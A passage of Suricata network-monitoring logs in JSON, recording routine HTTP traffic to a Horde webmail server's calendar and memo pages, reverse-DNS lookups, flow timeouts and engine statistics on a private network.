Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:10:22.824684+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":2}} {"timestamp":"2020-02-29T00:10:22.840079+0000","flow_id":1445628746846607,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42445,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23346,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:22.948426+0000","flow_id":1445628746846607,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42445,"proto":"UDP","dns":{"type":"answer","id":23346,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:22.948426+0000","flow_id":1445628746846607,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42445,"proto":"UDP","dns":{"type":"answer","id":23346,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:22.978088+0000","flow_id":1378485523115176,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53812,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2192,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:23.086656+0000","flow_id":1378485523115176,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53812,"proto":"UDP","dns":{"type":"answer","id":2192,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:23.086656+0000","flow_id":1378485523115176,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53812,"proto":"UDP","dns":{"type":"answer","id":2192,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:23.129248+0000","flow_id":110654126986856,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34788,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:10:23.129248+0000","flow_id":110654126986856,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34788,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:10:23.175862+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:10:23.175862+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:10:24.000668+0000","event_type":"stats","stats":{"uptime":14276,"capture":{"kernel_packets":134365,"kernel_drops":0},"decoder":{"pkts":134408,"bytes":92797098,"invalid":185,"ipv4":132931,"ipv6":8,"ethernet":134408,"raw":0,"null":0,"sll":0,"tcp":127724,"udp":5007,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2737,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2753,"synack":2744,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1777,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2286,"failed_udp":110},"tx":{"http":4582,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2365}},"flow_mgr":{"closed_pruned":2721,"new_pruned":15,"est_pruned":2341,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":80040,"memcap":0}}} {"timestamp":"2020-02-29T00:10:25.000291+0000","flow_id":374562667837138,"event_type":"flow","src_ip":"192.168.10.122","src_port":41142,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:23.472786+0000","end":"2020-02-29T00:05:23.581640+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:26.069213+0000","flow_id":106655512661597,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52175,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":40996,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:26.177585+0000","flow_id":106655512661597,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52175,"proto":"UDP","dns":{"type":"answer","id":40996,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:26.177585+0000","flow_id":106655512661597,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52175,"proto":"UDP","dns":{"type":"answer","id":40996,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:26.234777+0000","flow_id":1124421027940285,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752}} {"timestamp":"2020-02-29T00:10:28.134129+0000","flow_id":110654126986856,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34788,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:10:28.134889+0000","flow_id":1157088548497515,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34786,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":3}} {"timestamp":"2020-02-29T00:10:30.000411+0000","flow_id":893553631413293,"event_type":"flow","src_ip":"192.168.10.122","src_port":51580,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:29.640045+0000","end":"2020-02-29T00:05:29.748633+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:31.000321+0000","event_type":"stats","stats":{"uptime":14283,"capture":{"kernel_packets":134418,"kernel_drops":0},"decoder":{"pkts":134436,"bytes":92807270,"invalid":185,"ipv4":132957,"ipv6":8,"ethernet":134436,"raw":0,"null":0,"sll":0,"tcp":127747,"udp":5010,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2738,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2754,"synack":2745,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1779,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2287,"failed_udp":110},"tx":{"http":4583,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2366}},"flow_mgr":{"closed_pruned":2721,"new_pruned":15,"est_pruned":2342,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18847,"memcap_state":0,"memcap_global":0},"http":{"memuse":98031,"memcap":0}}} {"timestamp":"2020-02-29T00:10:31.235722+0000","flow_id":1124421027940285,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52714,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:10:32.001842+0000","flow_id":1021062620573906,"event_type":"flow","src_ip":"192.168.10.122","src_port":33976,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:30.454866+0000","end":"2020-02-29T00:05:30.563509+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:32.002075+0000","flow_id":214948798715515,"event_type":"flow","src_ip":"192.168.10.122","src_port":60298,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:30.841339+0000","end":"2020-02-29T00:05:30.949739+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:32.002142+0000","flow_id":113437246634505,"event_type":"flow","src_ip":"192.168.10.122","src_port":41347,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:05:30.670217+0000","end":"2020-02-29T00:05:30.778890+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:35.072059+0000","flow_id":1681976502983035,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35187,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54980,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:35.180346+0000","flow_id":1681976502983035,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35187,"proto":"UDP","dns":{"type":"answer","id":54980,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:35.180346+0000","flow_id":1681976502983035,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35187,"proto":"UDP","dns":{"type":"answer","id":54980,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:35.205288+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:10:35.205288+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":21,"tx_id":0}} {"timestamp":"2020-02-29T00:10:38.000235+0000","event_type":"stats","stats":{"uptime":14290,"capture":{"kernel_packets":134438,"kernel_drops":0},"decoder":{"pkts":134448,"bytes":92809310,"invalid":185,"ipv4":132969,"ipv6":8,"ethernet":134448,"raw":0,"null":0,"sll":0,"tcp":127757,"udp":5012,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2739,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2755,"synack":2746,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1780,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2288,"failed_udp":110},"tx":{"http":4584,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2367}},"flow_mgr":{"closed_pruned":2721,"new_pruned":15,"est_pruned":2346,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18184,"memcap_state":0,"memcap_global":0},"http":{"memuse":85424,"memcap":0}}} {"timestamp":"2020-02-29T00:10:39.238217+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:10:39.249184+0000","flow_id":1207756279237984,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45590,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43423,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:39.357577+0000","flow_id":1207756279237984,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45590,"proto":"UDP","dns":{"type":"answer","id":43423,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:39.357577+0000","flow_id":1207756279237984,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45590,"proto":"UDP","dns":{"type":"answer","id":43423,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:39.423600+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:10:39.423600+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":203,"tx_id":1}} {"timestamp":"2020-02-29T00:10:39.436232+0000","flow_id":2107843985516552,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4741,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:39.544428+0000","flow_id":2107843985516552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47317,"proto":"UDP","dns":{"type":"answer","id":4741,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:39.544428+0000","flow_id":2107843985516552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47317,"proto":"UDP","dns":{"type":"answer","id":4741,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:39.623452+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5582}} {"timestamp":"2020-02-29T00:10:41.000721+0000","flow_id":1096924642080953,"event_type":"flow","src_ip":"192.168.10.130","src_port":34776,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":14,"bytes_toserver":1975,"bytes_toclient":9936,"start":"2020-02-29T00:09:06.456889+0000","end":"2020-02-29T00:09:40.905025+0000","age":34,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:10:43.000564+0000","flow_id":1628697414491026,"event_type":"flow","src_ip":"192.168.10.122","src_port":50875,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:05:42.416658+0000","end":"2020-02-29T00:05:42.525766+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:10:43.170662+0000","flow_id":2049496855059110,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36997,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2212,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:10:43.278991+0000","flow_id":2049496855059110,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36997,"proto":"UDP","dns":{"type":"answer","id":2212,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:10:43.278991+0000","flow_id":2049496855059110,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36997,"proto":"UDP","dns":{"type":"answer","id":2212,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:10:43.455717+0000","flow_id":1133320201266640,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6627}} {"timestamp":"2020-02-29T00:10:44.624419+0000","flow_id":760048888043704,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5582},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":28526,"tx_id":2}} 